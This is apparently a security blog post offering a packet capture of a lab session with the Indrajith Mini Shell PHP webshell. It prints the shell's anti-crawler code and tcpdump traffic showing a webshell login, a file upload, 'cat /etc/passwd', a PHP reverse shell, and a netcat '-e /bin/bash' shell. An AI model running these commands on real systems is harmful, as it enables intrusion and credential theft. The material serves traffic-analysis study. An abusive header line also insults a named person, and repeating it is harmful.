Text Example

LAWRENCE KNACHEL IS A TROGLYODYTE PIECE OF SH!T - 3600 VISITORS DAILY WILL KNOW YOUR DAY IS COMING SOON

Indrajith Mini Shell v.2.0 Traffic Analysis Python Reverse Shell Pivot Netcat Shell PCAP file download webshell backdoor

Download Attachments

  • 1 pcap minishell
    Date added: January 20, 2017 10:43 am Added by: admin File size: 456 KB Downloads: 114

/*
* Indrajith Mini Shell v.2.0 with additional features….
* originally scripted by AJITH KP
* (c) Under Gnu General Public Licence 3(c)
* Team Open Fire and Indishell Family
* TOF : Shritam Bhowmick, Null | Void, Alex, Ankit Sharma,John.
* Indishell : ASHELL, D@rkwolf.
* THA : THA RUDE [There is Nothing in Borders]
* Love to : AMSTECK ARTS & SCIENCE COLLEGE, Kalliassery; Vishnu Nath KP, Sreeju, Sooraj, Computer Korner Friends.
*/

/*—————— LOGIN ——————-*/

$username=”admin”;
$password=”password”;
$email=”blah@gmail.com”;

/*—————— Login Data End ———-*/

@error_reporting(4);

/*—————— Anti Crawler ————*/
if(!empty($_SERVER[‘HTTP_USER_AGENT’]))
{
$userAgents = array(“Google”, “Slurp”, “MSNBot”, “ia_archiver”, “Yandex”, “Rambler”);
if(preg_match(‘/’ . implode(‘|’, $userAgents) . ‘/i’, $_SERVER[‘HTTP_USER_AGENT’]))
{
header(‘HTTP/1.0 404 Not Found’);
exit;
}
}
echo “<meta name=\”ROBOTS\” content=\”NOINDEX, NOFOLLOW\” />”; //For Ensuring… Fuck all Robots…
/*—————— End of Anti Crawler —–*/

http://computersecurity.org/images/pcapanalysis/minishell2.png

http://computersecurity.org/images/pcapanalysis/minishell.png

 

2017-01-20 04:53:39.022938 IP 192.168.1.102.56105 > 192.168.1.100.55555: Flags [P.], seq 703:1131, ack 1011, win 2049, length 428
E…..@…F6…f…d.)……4,!.P….$..GET /minishell.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

2017-01-20 04:53:39.023459 IP 192.168.1.100.55555 > 192.168.1.102.56105: Flags [P.], seq 1011:3471, ack 1131, win 254, length 2460
E.      .j.@.@.C….d…f…)4,!…..P…….HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 09:53:39 GMT
Server: Apache/2.4.18 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2208
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

………..YYs…~..B.T_w..1x…..6q..m;.d^…….D.R..G…….~……..}G..H.E…..W.M…y…G.Gz….z…..’…..}..O…….E…*….[x..a..Z{3..M…..T.b..pd.C…vah…i.9#:.w.l.6/..”W..yr..S7…..c6o……?.nF……h..9a.._../…..h.7Q`…..8….O…O9Z4.Q…_.yX_.Y?….=~……Xe…U.?…………z…5.i…M…1.N…….u;..o…..s.<….6…..%eeHs..[..xh…=.T.JU…I.`i….J………?……h.Z..]…..35.mx.V…O…:……..B…qlHWg…r.L[…5;.wD…t…W…..=V./..:.X-t.>N…….7.o7> ……|X….ttqfQ.&q…..0M…,Q/…5.B.mH^.t..@.M\……V.G..D…&d…q…o……….7|..y….}..w………8..=……..B…Y^>whEp.@…….IlEnH..e#l.D.W…(P.&…6.Nkp.TO;9.k        ….tO-.&.B….\……..b.}OY.gdv…J…’6`o…..<.#..O.&…xE…V4.H.d.”&.c]…d… ..[..F{..  .-.&,….e.)\.@..D..+I..O+…?qQ.=S…~L..@….H.).{…Rn)….f..H|…\,…..Z..{. !.9….._……?.x,u.0..W.[Tf”…….KA..s.B..2,.#….spH2E….i*.V…..”.4…..#v…4.g.Xd.$…pnaM.        .]…..$
.R9……..CA.0Q5.Rj,…….YZi.`.Y.B..W….3ne..p$….3……D.uG.!6….N..p?..N1.k.y.p_67.R…..3..5..3..L..l67..}.y..)..n..!..;….lS..7..#d…@…..H.”….;1……+[@-..R”.!….LL
~……….?…..Z….0..)…JD.v..     Y..`B….0r…7…C….’.9….4.W..|).{ttTH….0.p.V[..&.       .oe>.P…S ‘fV..!…Ss.ug68.T ..tD..Y…….4SP……:EXR..}.v..5….<b…..48..@..O.Ur..M.A….cH………)I.Hcb…?v.1….t(……..z.).UB.0R……=v………..vJ    …..Z..OG..Q@u.`…….8…………0.B/..(..N….,..m….’…vse..)..A.\X…I..o5..*G……….4<……Q.W.$..-i..H..U#..h..j..i…6…-vS.*…%.B4..}..(N.5….z..N…#…..8.b..agC.m.Z……..~.`P.X.P.?……..{……Wr…W…k
|.B..p#….v..’=%….B…..Z..,A.q-…….’.|..B[om     ..?..R.L..APk.WQ..{.e…..Vs0<.~……..e.@….7..mx.%40ya..|o..h…q`}1c.H.f.z…K0……z>.9..3…<.7..n=..MtN.-..k.’..^…..<.2G….W………N……..N.}….,t…:.{…mL.I..u.~
….

 

2017-01-20 04:53:47.492620 IP 192.168.1.102.56109 > 192.168.1.100.55555: Flags [P.], seq 1:617, ack 1, win 2053, length 616
E…..@…Eh…f…d.-..i.].V.kUP… …POST /minishell.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 49
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8

action=login&hide=&usrname=ry4wn&passwrd=password
2017-01-20 04:53:47.492641 IP 192.168.1.100.55555 > 192.168.1.102.56109: Flags [.], ack 617, win 238, length 0
E..(..@.@……d…f…-V.kUi.`XP….5..
2017-01-20 04:53:47.641385 IP 192.168.1.100.55555 > 192.168.1.102.56109: Flags [P.], seq 1:4840, ack 617, win 238, length 4839
E…..@.@……d…f…-V.kUi.`XP…….HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 09:53:47 GMT
Server: Apache/2.4.18 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4586
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

 

2017-01-20 04:54:16.709688 IP 192.168.1.102.56114 > 192.168.1.100.55555: Flags [P.], seq 1:665, ack 1, win 2053, length 664
E…..@…E1…f…d.2…,….3^P…
…POST /minishell.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 23520
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryl1cCBVNLAAiFAzMh
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:54:16.709713 IP 192.168.1.100.55555 > 192.168.1.102.56114: Flags [.], ack 665, win 239, length 0
E..(.7@.@..~…d…f…2..3^.,..P….5..
2017-01-20 04:54:16.744669 IP 192.168.1.102.56114 > 192.168.1.100.55555: Flags [.], seq 665:6505, ack 1, win 2053, length 5840
E…..@…0….f…d.2…,….3^P…….——WebKitFormBoundaryl1cCBVNLAAiFAzMh
Content-Disposition: form-data; name=”path”

/var/www/html
——WebKitFormBoundaryl1cCBVNLAAiFAzMh
Content-Disposition: form-data; name=”upload_f”; filename=”cerber4.PNG”
Content-Type: image/png

.PNG

2017-01-20 04:54:29.004913 IP 192.168.1.102.56118 > 192.168.1.100.55555: Flags [P.], seq 1:527, ack 1, win 2053, length 526
E..6/.@…E….f…d.6..V*mr>-.*P…xu..GET /minishell.php?path=%2Fvar%2Fwww%2Fhtml HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php?
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:54:29.004929 IP 192.168.1.100.55555 > 192.168.1.102.56118: Flags [.], ack 527, win 237, length 0
E..(.A@.@..s…d…f…6>-.*V*o.P….5..
2017-01-20 04:54:29.006011 IP 192.168.1.100.55555 > 192.168.1.102.56118: Flags [P.], seq 1:4781, ack 527, win 237, length 4780
E….B@.@……d…f…6>-.*V*o.P…….HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 09:54:29 GMT
Server: Apache/2.4.18 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4527
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 04:55:04.451424 IP 192.168.1.102.56136 > 192.168.1.100.55555: Flags [P.], seq 1:554, ack 1, win 2053, length 553
E..Q/L@…E@…f…d.H..d…..N.P…Y…GET /minishell.php?path=%2Fvar%2Fwww%2Fhtml&cmdexe=cat+%2Fetc%2Fpasswd HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php?
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:55:04.451446 IP 192.168.1.100.55555 > 192.168.1.102.56136: Flags [.], ack 554, win 237, length 0
E..(..@.@.1….d…f…H..N.d…P….5..
2017-01-20 04:55:04.454232 IP 192.168.1.100.55555 > 192.168.1.102.56136: Flags [P.], seq 1:4888, ack 554, win 237, length 4887
E..?..@.@……d…f…H..N.d…P….L..HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 09:55:04 GMT
Server: Apache/2.4.18 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4634
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 04:56:27.249472 IP 192.168.1.102.56179 > 192.168.1.100.55555: Flags [P.], seq 1:566, ack 1, win 2053, length 565
E..]/.@…D….f…d.s…pk..7..P…&…GET /minishell.php?rev_option=PHP+Reverse+Shell&my_ip=192.168.1.102&my_port=4444 HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php?rs
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:56:27.249487 IP 192.168.1.100.55555 > 192.168.1.102.56179: Flags [.], ack 566, win 237, length 0
E..(..@.@……d…f…s.7…pm;P….5..
2017-01-20 04:56:27.249992 IP 192.168.1.100.39338 > 192.168.1.102.4444: Flags [S], seq 1272629225, win 29200, options [mss 1460,sackOK,TS val 761732068 ecr 0,nop,wscale 7], length 0
E..<..@.@……d…f…\K………r..I………
-g……….
2017-01-20 04:56:27.279498 IP 192.168.1.100.55555 > 192.168.1.102.56177: Flags [.], ack 567, win 237, length 0
E..(.&@.@……d…f…q…5…gP….5..
2017-01-20 04:56:27.753875 IP 192.168.1.102.56174 > 192.168.1.105.62663: Flags [R.], seq 2302, ack 1364, win 0, length 0
E..(.m@…qC…f…i.n..7.UM%l..P………….
2017-01-20 04:56:27.906170 IP 192.168.1.102.56086 > 172.217.5.238.443: Flags [.], seq 0:1, ack 1, win 255, length 1
E..)j.@….^…f…………..j.P….U……..
2017-01-20 04:56:28.150144 IP 192.168.1.102.56087 > 172.217.7.161.443: Flags [.], seq 0:1, ack 1, win 255, length 1
E..)p.@….O…f……….K..”..P…~………
2017-01-20 04:56:28.247493 IP 192.168.1.100.39338 > 192.168.1.102.4444: Flags [S], seq 1272629225, win 29200, options [mss 1460,sackOK,TS val 761732318 ecr 0,nop,wscale 7], length 0
E..<..@.@……d…f…\K………r..I………
-g……….
2017-01-20 04:56:28.295154 IP 192.168.1.102.55993 > 74.125.192.188.5228: Flags [.], seq 0:1, ack 1, win 258, length 1
E..)..@….Y…fJ}…..l….wm7KP….r……..
2017-01-20 04:56:28.435666 IP 192.168.1.102.56088 > 172.217.3.46.443: Flags [.], seq 0:1, ack 1, win 256, length 1
E..)..@……..f……..4.p….tP…=………
2017-01-20 04:56:30.251494 IP 192.168.1.100.39338 > 192.168.1.102.4444: Flags [S], seq 1272629225, win 29200, options [mss 1460,sackOK,TS val 761732819 ecr 0,nop,wscale 7], length 0
E..<..@.@……d…f…\K………r..I………
-g……….

2017-01-20 04:56:35.021686 IP 192.168.1.102.56180 > 192.168.1.100.55555: Flags [P.], seq 1:566, ack 1, win 2053, length 565
E..]/.@…D….f…d.t….p.f.TYP…_…GET /minishell.php?rev_option=PHP+Reverse+Shell&my_ip=192.168.1.101&my_port=4444 HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php?rs
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:56:35.021703 IP 192.168.1.100.55555 > 192.168.1.102.56180: Flags [.], ack 566, win 237, length 0
E..(w”@.@.?….d…f…tf.TY..rIP….5..
2017-01-20 04:56:35.022202 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [S], seq 3778293001, win 29200, options [mss 1460,sackOK,TS val 761734011 ecr 0,nop,wscale 7], length 0
E..<.r@.@..0…d…e.z.\.4-     ……r..H………
-g#{……..
2017-01-20 04:56:35.022902 IP 192.168.1.101.4444 > 192.168.1.100.57978: Flags [S.], seq 1108359154, ack 3778293002, win 14480, options [mss 1460,sackOK,TS val 288241756 ecr 761734011,nop,wscale 6], length 0
E..<..@.@……e…d.\.zB.7..4-
..8.t……….
..8\-g#{….
2017-01-20 04:56:35.022912 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [.], ack 1, win 229, options [nop,nop,TS val 761734011 ecr 288241756], length 0
E..4.s@.@..7…d…e.z.\.4-
B.7……@…..
-g#{..8\
2017-01-20 04:56:35.024064 IP 192.168.1.101.4444 > 192.168.1.100.57978: Flags [P.], seq 1:17, ack 1, win 227, options [nop,nop,TS val 288241756 ecr 761734011], length 16
E..D..@.@……e…d.\.zB.7..4-
…..r…..
..8\-g#{cat /etc/passwd

2017-01-20 04:56:35.024076 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [.], ack 17, win 229, options [nop,nop,TS val 761734012 ecr 288241756], length 0
E..4.t@.@..6…d…e.z.\.4-
B.8……@…..
-g#|..8\
2017-01-20 04:56:35.024600 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [P.], seq 1:94, ack 17, win 229, options [nop,nop,TS val 761734012 ecr 288241756], length 93
E….u@.@……d…e.z.\.4-
B.8…………
-g#|..8\Linux wittyserver 4.3.0-kali1-amd64 #1 SMP Debian 4.3.3-5kali4 (2016-01-13) x86_64 GNU/Linux

2017-01-20 04:57:39.776713 IP 192.168.1.101.4444 > 192.168.1.100.57978: Flags [P.], seq 34:73, ack 4295, win 453, options [nop,nop,TS val 288248231 ecr 761737394], length 39
E..[..@.@……e…d.\.zB.8..4=…………
..Q.-g0.nc -nv 192.168.1.100 5555 -e /bin/bash

2017-01-20 04:57:39.777076 IP 192.168.1.101.22 > 192.168.1.100.53010: Flags [P.], seq 8009:8049, ack 2960, win 408, options [nop,nop,TS val 288248231 ecr 761750200], length 40
E..\..@.@.3….e…d…..xy.’bt4….t……
..Q.-gb…P@*.u..L%S.d..\r..d.@yo..>;.X..9.#n&h.
2017-01-20 04:57:39.777085 IP 192.168.1.100.53010 > 192.168.1.101.22: Flags [.], ack 8049, win 1233, options [nop,nop,TS val 761750200 ecr 288248231], length 0
E..4v.@.@.?….d…e….’bt4.xyF…..@…..
-gb…Q.
2017-01-20 04:57:39.777528 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [P.], seq 4295:4335, ack 73, win 229, options [nop,nop,TS val 761750200 ecr 288248231], length 40
E..\..@.@……d…e.z.\.4=.B.8;…..h…..
-gb…Q.(UNKNOWN) [192.168.1.100] 5555 (?) open

 

-g……….

Leave a Reply